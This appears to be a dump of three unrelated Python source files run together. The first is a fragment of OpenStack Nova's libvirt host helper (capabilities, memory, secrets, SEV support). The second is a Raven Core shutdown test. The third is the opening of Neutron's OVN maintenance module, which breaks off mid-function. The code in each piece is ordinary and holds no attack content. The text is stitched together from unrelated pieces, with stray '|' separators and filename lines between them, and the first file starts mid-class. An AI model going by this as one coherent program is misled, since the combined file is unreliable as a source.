def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
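# Worked example (hypothetical version): has_min_version(lv_ver=(4, 0, 0))
# calls _version_check with op=operator.lt, and
# versionutils.convert_version_to_int((4, 0, 0)) == 4000000, so it returns
# False exactly when conn.getLibVersion() < 4000000, i.e. libvirt < 4.0.0.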
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
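# Example: list_instance_domains(only_running=False) passes
# VIR_CONNECT_LIST_DOMAINS_ACTIVE | VIR_CONNECT_LIST_DOMAINS_INACTIVE
# to listAllDomains(), so shut-off domains are returned as well.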
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: a set of online CPUs; raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
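# Example getCPUMap() result (hypothetical 4-CPU host with CPU 2 offline):
# cpus=4, cpu_map=(True, True, False, True), online=3, which the loop
# above turns into the set {0, 1, 3}.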
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
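# Illustrative shape of the memoized result (hypothetical machine types):
#
#     {'x86_64': {'pc-i440fx-2.11': <LibvirtConfigDomainCaps>,
#                 'pc-q35-2.11': <LibvirtConfigDomainCaps>,
#                 'pc': <LibvirtConfigDomainCaps (alias entry)>}}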
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recorded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
:param usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
# Anything other than "no secret" is a real failure; re-raise it
# rather than silently returning None.
raise
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
:param usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
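# A minimal usage sketch for the secret helpers (hypothetical values;
# note that 'rbd' is normalized to libvirt's 'ceph' usage type):
#
#     host.create_secret('rbd', 'client.cinder secret', password=key)
#     secret = host.find_secret('rbd', 'client.cinder secret')
#     host.delete_secret('rbd', 'client.cinder secret')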
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get the real memory used by dom0 under Xen.
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
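# Worked example (hypothetical /proc/meminfo values): with
# 'MemFree: 1024 kB', 'Buffers: 256 kB' and 'Cached: 512 kB', the
# split() list yields avail = 1024 + 256 + 512 = 1792 (in kB).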
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with dom0's usage
# counted as its reported memory minus available host memory
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# Element 3 is the CPU frequency (in MHz).
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
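# Example (hypothetical topology): a cell whose cpus report sibling sets
# {0, 4} and {1, 5} has len(cpu.siblings) == 2 > 1, so SMT is detected;
# cpus with an empty siblings list are skipped by the inner filter.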
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test ravend shutdown."""
from threading import Thread
from test_framework.test_framework import RavenTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(RavenTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
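# (getrpcinfo counts itself, so two active commands means the
# waitfornewblock above plus this polling call.)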
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure the event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
maintenance.py | # Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import segment as segment_def
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.db import segments_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
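# A minimal usage sketch (hypothetical wiring; ovn_client and group come
# from the mech driver):
#
#     thread = MaintenanceThread()
#     thread.add_periodics(DBInconsistenciesPeriodics(ovn_client))
#     thread.add_periodics(HashRingHealthCheckPeriodics(group))
#     thread.start()
#     # later, on shutdown:
#     thread.stop()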
def rerun_on_schema_updates(func):
"""Tasks decorated with this will rerun upon database version updates."""
func._rerun_on_schema_updates = True
return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
"""Event listening to reconnections from OVN Northbound DB."""
def __init__(self, driver, version):
self.driver = driver
self.version = version
table = 'Connection'
events = (self.ROW_CREATE,)
super(OVNNBDBReconnectionEvent, self).__init__(events, table, None)
self.event_name = self.__class__.__name__
def run(self, event, row, old):
curr_version = self.driver.get_ovn_nbdb_version()
if self.version != curr_version:
self.driver.nbdb_schema_updated_hook()
self.version = curr_version
class SchemaAwarePeriodicsBase(object):
def __init__(self, ovn_client):
self._nb_idl = ovn_client._nb_idl
self._set_schema_aware_periodics()
self._nb_idl.idl.notify_handler.watch_event(OVNNBDBReconnectionEvent(
self, self.get_ovn_nbdb_version()))
def get_ovn_nbdb_version(self):
return self._nb_idl.idl._db.version
def _set_schema_aware_periodics(self):
self._schema_aware_periodics = []
for name, member in inspect.getmembers(self):
if not inspect.ismethod(member):
continue
schema_upt = getattr(member, '_rerun_on_schema_updates', None)
if schema_upt and periodics.is_periodic(member):
LOG.debug('Schema aware periodic task found: '
'%(owner)s.%(member)s',
{'owner': self.__class__.__name__, 'member': name})
self._schema_aware_periodics.append(member)
@abc.abstractmethod
def nbdb_schema_updated_hook(self):
"""Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks?
self._nb_idl = self._ovn_client._nb_idl
self._sb_idl = self._ovn_client._sb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip_in_nat_or_lb,
'ovn_create': self._create_floatingip_and_pf,
'ovn_update': self._update_floatingip_and_pf,
'ovn_delete': self._delete_floatingip_and_pf,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._nb_idl.get_port_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
@property
def has_lock(self):
return not self._idl.is_lock_contended
def nbdb_schema_updated_hook(self):
if not self.has_lock:
return
for func in self._schema_aware_periodics:
LOG.debug('OVN Northbound DB schema version was updated, '
'invoking "%s"', func.__name__)
try:
func()
except periodics.NeverAgain:
pass
except Exception:
LOG.exception(
'Unknown error while executing "%s"', func.__name__)
def _fix_create_update(self, context, row):
res_map = self._resources_func_map[row.resource_type]
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](context, n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
# If the resource exists in the OVN DB but the revision
# number differs from the Neutron DB, update it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](context, n_obj)
else:
# If the resource exists and the revision number
# is equal in both databases, just bump the revision on
# the cache table.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
def _fix_delete(self, context, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
revision_numbers_db.delete_revision(
context, row.resource_uuid, row.resource_type)
else:
